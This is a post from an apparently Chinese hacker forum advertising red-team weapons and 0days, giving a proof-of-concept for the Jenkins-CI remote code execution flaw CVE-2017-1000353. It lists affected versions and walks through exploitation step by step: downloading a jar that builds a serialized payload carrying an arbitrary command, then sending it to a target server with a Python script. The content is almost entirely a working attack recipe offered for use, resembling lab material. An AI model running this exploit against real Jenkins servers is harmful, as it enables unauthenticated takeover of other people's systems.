黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

POC Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
Python:
## 漏洞概述

攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

## 影响范围

```http
Jenkins <=2.56
Jenkins LTS <= 2.46.1
```

## 漏洞利用

1、下载[CVE-2017-1000353-1.1-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具

执行下面命令,生成字节码文件

```bash
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令
```

2、将刚才生成的字节码文件发送给目标

```bash
python CVE-2017-1000353.py http://your-ip:8080 jenkins_poc.ser
```
 
后退
顶部